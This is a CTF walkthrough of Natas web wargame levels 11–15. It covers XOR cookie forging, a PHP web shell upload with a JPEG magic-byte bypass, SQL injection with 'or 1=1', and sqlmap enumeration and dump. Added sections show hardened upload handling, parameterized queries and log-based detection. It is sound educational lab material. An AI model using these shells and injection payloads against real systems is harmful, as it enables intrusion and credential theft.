Natas Web. Walkthrough of a CTF platform aimed at exploiting web vulnerabilities. Part 2




In this article we will deal with the exploitation of some web vulnerabilities, using the Natas wargame as an example. Each level gives access to the password for the next level. All passwords are also stored in files under /etc/natas_webpass/. For example, the password for natas5 is stored in the file /etc/natas_webpass/natas5 and is readable only by the users natas4 and natas5.



Organizational Information
Especially for those who want to learn something new and develop in any of the areas of information and computer security, I will write and talk about the following categories:



  • PWN;
  • cryptography (Crypto);
  • network technologies (Network);
  • reverse (Reverse Engineering);
  • steganography (Stegano);
  • search and exploitation of WEB vulnerabilities.


In addition to this, I will share my experience in computer forensics, analysis of malware and firmware, attacks on wireless networks and local area networks, conducting pentests and writing exploits.



So that you can find out about new articles, software and other information, I have created a Telegram channel and a group for discussing any questions in the field of information and computer security. I will also personally consider your requests, questions, suggestions and recommendations, and will answer everyone.



All information is provided for educational purposes only. The author of this document does not bear any responsibility for any damage caused to anyone as a result of using knowledge and methods obtained as a result of studying this document.



level 11



We analyze the code:

  1. the password is shown if the value in the data array under the key showpassword is "yes";
  2. the data array is created by the loadData function, which receives the default data as a parameter;
  3. the loadData function loads the values from the cookie (it base64-decodes the cookie, XORs it with an unknown key and decodes the result from JSON);
  4. the received values are then set.


What needs to be done:

  1. recover the XOR key:
    • take the encrypted data from the cookie;
    • base64-decode it;
    • JSON-encode the default data;
    • XOR the two resulting strings together: ciphertext XOR known plaintext gives the key stream, in which the short key visibly repeats;
  2. encode and encrypt the new data with the reverse algorithm, where showpassword == yes;
  3. put the new data into the cookie and reload the page.





<?php
// Repeating-key XOR copied from the level's source: byte i is XORed with key[i % strlen(key)].
function xor_encrypt($in, $k) {
    $key = $k;
    $text = $in;
    $outText = '';
    for ($i = 0; $i < strlen($text); $i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }
    return $outText;
}

// The cookie value observed in the browser, the default data it encodes,
// and the data we want the server to see instead.
$old_data_code = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw";
$old_data_decode = array("showpassword" => "no", "bgcolor" => "#ffffff");
$new_data_decode = array("showpassword" => "yes", "bgcolor" => "#ffffff");

// ciphertext XOR known plaintext = the key stream (the key repeated over the whole length)
$KEY = xor_encrypt(base64_decode($old_data_code), json_encode($old_data_decode));
echo "key: " . $KEY . "\n";

// the key stream repeats every four characters, so the key is "qw8J"
$KEY = "qw8J";
$new_data_code = base64_encode(xor_encrypt(json_encode($new_data_decode), $KEY));
echo "new cookie: " . $new_data_code . "\n";
?>
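The same key recovery and cookie forging in Python, as an added example that is not part of the original article or of the Natas code. The cookie value and the default data array are the ones from the walkthrough above; the helper names (recover_key, forge_cookie, shortest_period, decode_cookie) are my own. Instead of reading the repeating key off by eye, it computes the shortest period of the recovered key stream, and it re-runs the server's own decoding on the forged cookie to confirm what loadData would see:

```python
import base64
import json

# Values taken from the level-11 walkthrough: the cookie seen in the browser
# and the default data array that the application's loadData() starts from.
OLD_COOKIE = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw"
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}


def php_json(data: dict) -> bytes:
    """Serialize like PHP's json_encode(): no spaces after separators."""
    return json.dumps(data, separators=(",", ":")).encode()


def b64decode_lenient(s: str) -> bytes:
    """base64-decode even when '=' padding was dropped (PHP's base64_decode is lenient)."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the level's xor_encrypt()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def shortest_period(stream: bytes) -> bytes:
    """Return the shortest repeating unit of a key stream, i.e. the actual key."""
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - p] for i in range(p, len(stream))):
            return stream[:p]
    return stream


def recover_key(cookie: str, known_plaintext: dict) -> bytes:
    """ciphertext XOR known plaintext = key stream; collapse it to the repeating key."""
    ciphertext = b64decode_lenient(cookie)
    plaintext = php_json(known_plaintext)
    if len(ciphertext) != len(plaintext):
        raise ValueError("cookie length does not match the assumed plaintext")
    return shortest_period(xor_bytes(ciphertext, plaintext))


def forge_cookie(data: dict, key: bytes) -> str:
    """Encrypt and encode new data the way the application expects it back."""
    return base64.b64encode(xor_bytes(php_json(data), key)).decode()


def decode_cookie(cookie: str, key: bytes) -> dict:
    """What the server's loadData() does: base64 -> XOR -> JSON."""
    return json.loads(xor_bytes(b64decode_lenient(cookie), key))


if __name__ == "__main__":
    key = recover_key(OLD_COOKIE, DEFAULT_DATA)
    print("key:", key.decode())
    forged = forge_cookie({"showpassword": "yes", "bgcolor": "#ffffff"}, key)
    print("new cookie:", forged)
    print("server would see:", decode_cookie(forged, key))
```

The weakness is that the cookie is only XORed, never authenticated: anyone who knows the default plaintext recovers the key in one pass and can then write whatever state they like. An HMAC over the cookie, or keeping the state server-side under a random session id, is what closes this.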
      
      








level 12



When you upload a file to the site, it is saved under a random name with a JPEG extension. The important thing is that this name is generated and handed to the user in a hidden field of the form even before a file is selected, and is then sent to the server together with the file.






Task: create a PHP shell, intercept the request to the server and change the file name to *.php.



 <? echo system($_GET["cmd"]); ?>



We use Burp Suite: set the browser's proxy to 127.0.0.1:8080, submit the shell, and in the Proxy tab modify the request.






We then open our file on the server, passing commands to the command line through the cmd parameter.



 cat /etc/natas_webpass/natas13

This type of vulnerability is classified as Unrestricted File Upload.


To create a shell it is best to use PHP constants, since the execution of system functions may be prohibited by the server settings.


level 13



When we upload the same shell to the server, we are told that it is not an image. We analyze the code.






The check is done with the exif_imagetype function.






To recognise a JPEG file, this function uses the internal function is_jpeg, which only checks the first four bytes of the file.






The point is that the PHP interpreter executes only the code between <? ?> tags; everything outside them is not interpreted. Open the shell from the previous level in a hex editor and add the bytes 0xFFD8FFE0 to the beginning of the file.






Upload it to the site as in the previous level and get the password.
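Levels 12 and 13 come down to the same two upload-handling mistakes: the stored filename (and with it the extension) arrives from the client's hidden form field, and the only content check is the four JPEG magic bytes. The following Python is an added example, not the Natas code or the article's own, that contrasts the trusting handler with a hardened one. UPLOAD_DIR, ALLOWED_EXTENSIONS and the function names are assumptions; POLYGLOT is a constructed sample that begins with the magic bytes and then contains ordinary text:

```python
import os
import secrets

# The four bytes the level-13 write-up says is_jpeg() looks at.
JPEG_MAGIC = b"\xff\xd8\xff\xe0"
# Assumed upload directory and extension whitelist; not from the original page.
UPLOAD_DIR = "/var/www/uploads"
ALLOWED_EXTENSIONS = {".jpg", ".jpeg"}

# Constructed sample: JPEG magic followed by text that is not image data at all.
POLYGLOT = JPEG_MAGIC + b"<!-- anything but pixels -->"


def is_jpeg(data: bytes) -> bool:
    """Mirror of the 'first four bytes' check; a polyglot satisfies it trivially."""
    return data[:4] == JPEG_MAGIC


def vulnerable_target(client_filename: str) -> str:
    """Level-12 behaviour: the name from the hidden form field is trusted verbatim,
    so the client decides the extension and therefore whether the server executes it."""
    return os.path.join(UPLOAD_DIR, client_filename)


def hardened_target(client_filename: str, data: bytes) -> str:
    """The client's name is only inspected to reject unexpected extensions; the
    stored name and extension are chosen on the server, so a .php name never
    reaches disk even if the content check is fooled."""
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    if not is_jpeg(data):
        raise ValueError("content does not look like a JPEG")
    # Opaque, server-generated name with a fixed extension; the original name is discarded.
    return os.path.join(UPLOAD_DIR, secrets.token_hex(16) + ".jpg")


def extension_of(path: str) -> str:
    return os.path.splitext(path)[1].lower()


if __name__ == "__main__":
    print("polyglot passes is_jpeg:", is_jpeg(POLYGLOT))
    print("vulnerable handler stores:", vulnerable_target("shell.php"))
    try:
        hardened_target("shell.php", POLYGLOT)
    except ValueError as e:
        print("hardened handler rejects shell.php:", e)
    print("hardened handler, legitimate name:", hardened_target("photo.jpg", POLYGLOT))
```

is_jpeg() still accepts the polyglot, which is the level-13 lesson: a magic-byte check says nothing about the rest of the file. What actually prevents execution is that the hardened handler never lets the client choose the stored name or extension; storing uploads outside the document root (or with script execution disabled for that directory) and re-encoding images through an image library add further layers.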






level 14



A common mistake in authorization forms. The database query:



 SELECT * from users where username="username" and password="password";



The query can always be made true by entering as the login: admin" or 1=1 -- 






In this case "or 1=1" makes the condition true, and the rest of the query is commented out:



 SELECT * from users where username="admin" or 1=1;

We get the password.




This type of vulnerability belongs to the category of SQL Injection.
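The query from the level above, rebuilt in Python on an in-memory SQLite database, as an added example that is not part of the original article. SQLite stands in for MySQL, so the string literals are single-quoted and the injection is adapted accordingly; the table contents are constructed. The vulnerable function splices the input into the SQL text exactly as the form does, the parameterized one binds it:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the level's users table (SQLite, in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("natas15", "constructed-password-1"), ("alice", "constructed-password-2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The pattern behind level 14: user input spliced into the SQL text."""
    query = (
        "SELECT * FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(query).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bound parameters: the input can never close the literal,
    so the password check cannot be commented out."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchall()


# The page's injection adapted to single quotes: closes the literal, adds a
# tautology, and comments out the rest of the statement.
INJECTION = "admin' or 1=1 -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected:   ", login_vulnerable(db, INJECTION, "x"))
    print("parameterized, injected:", login_parameterized(db, INJECTION, "x"))
    print("parameterized, real creds:",
          login_parameterized(db, "natas15", "constructed-password-1"))
```

With the spliced query the input closes the literal, "or 1=1" makes the WHERE clause true for every row, and "-- " comments out the password check, so every user comes back. With bound parameters the entire string is compared against the username column as data, and the same input simply matches no user.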


level 15



On this form we look at how sqlmap works. Submit the form and intercept the request data and the HTTP headers.






We take only the necessary information from the headers, in this case User-Agent, Referer and Authorization, and set the sqlmap parameters:








Sqlmap determined that the username parameter is vulnerable to boolean-based blind injection and showed the database's response for the true condition (in subsequent scans you can specify the vulnerable parameter and the injection type straight away: -p username and --technique=B).

  • B: Boolean-based blind SQL injection
  • U: UNION query SQL injection
  • T: Time-based blind SQL injection
  • E: Error-based SQL injection
  • S: Stacked queries SQL injection


Sqlmap detected the MySQL DBMS (in subsequent scans, --dbms=MySQL) and asked whether it should determine the MySQL version (default: yes).






Sqlmap reported that the MySQL version is >= 5.0.12 (this is needed to choose the DBMS-specific constants).






Sqlmap determined the payload for the username parameter and asked whether the other parameters should be checked as well (default: no). It also shows the payload.






It provides information about the host and, as we requested, the current database: natas15.






With this new information we find out the tables in the natas15 database:








Sqlmap found one table, users.






We find out the columns of the users table:








Sqlmap found 2 columns.






We dump the users table (option --dump). The dump took 3 minutes. Running the request in 8 threads (--threads 8) brought it down to 1 minute.






We get the password.
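Seen from the defending side, a boolean-based blind scan like the one above is noisy: sqlmap sends the same parameter with a condition that is always true and one that is always false and compares the responses. The following Python is an added example, not the article's or sqlmap's code, that looks for that pattern in web-server access logs. The log lines are constructed (combined log format, with GET requests so the parameter is visible in the log; for a POST form the same logic needs request-body logging), and the regexes and function names are my own. The probing client deliberately carries a normal browser User-Agent, because the walkthrough copied the real browser's headers into sqlmap, so a User-Agent match alone would miss it:

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format); not taken from the original page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?username=natas16 HTTP/1.1" 200 1180 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?username=natas16%27%20AND%201234%3D1234%20AND%20%27a%27%3D%27a HTTP/1.1" 200 1180 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?username=natas16%27%20AND%201234%3D5678%20AND%20%27a%27%3D%27a HTTP/1.1" 200 1142 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php?username=bob HTTP/1.1" 200 1142 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A numeric comparison glued on with AND/OR: "AND 1234=1234" (always true) or
# "AND 1234=5678" (always false) is the signature of a boolean-based blind probe.
PROBE_RE = re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)


def classify_probe(value: str):
    """True for a tautology, False for a contradiction, None if no probe pattern."""
    m = PROBE_RE.search(value)
    if not m:
        return None
    return m.group(2) == m.group(3)


def find_boolean_blind_probes(log_text: str) -> list:
    """Group probes by (client, path, parameter). A client that sends both a true
    and a false condition to the same parameter is comparing the application's
    responses, which is exactly what --technique=B does."""
    seen = defaultdict(lambda: {"conditions": set(), "requests": 0, "sizes": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for param, value in parse_qsl(parts.query):  # parse_qsl percent-decodes the value
            verdict = classify_probe(value)
            if verdict is None:
                continue
            entry = seen[(m["ip"], parts.path, param)]
            entry["conditions"].add(verdict)
            entry["requests"] += 1
            entry["sizes"].add(m["size"])
    findings = []
    for (ip, path, param), entry in seen.items():
        if entry["conditions"] == {True, False}:
            findings.append({
                "ip": ip, "path": path, "param": param,
                "requests": entry["requests"],
                # differing response sizes mean the page itself leaks the condition
                "differential_response": len(entry["sizes"]) > 1,
            })
    return findings


if __name__ == "__main__":
    for finding in find_boolean_blind_probes(SAMPLE_LOG):
        print(finding)
```

On the sample log the only finding is 10.0.0.7 probing the username parameter of /index.php, and the two response sizes differ, which is the same differential the scanner relies on. Detection at this level is a compensating control; the fix is the parameterized query from the previous level.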



To be continued. You can join us on Telegram .


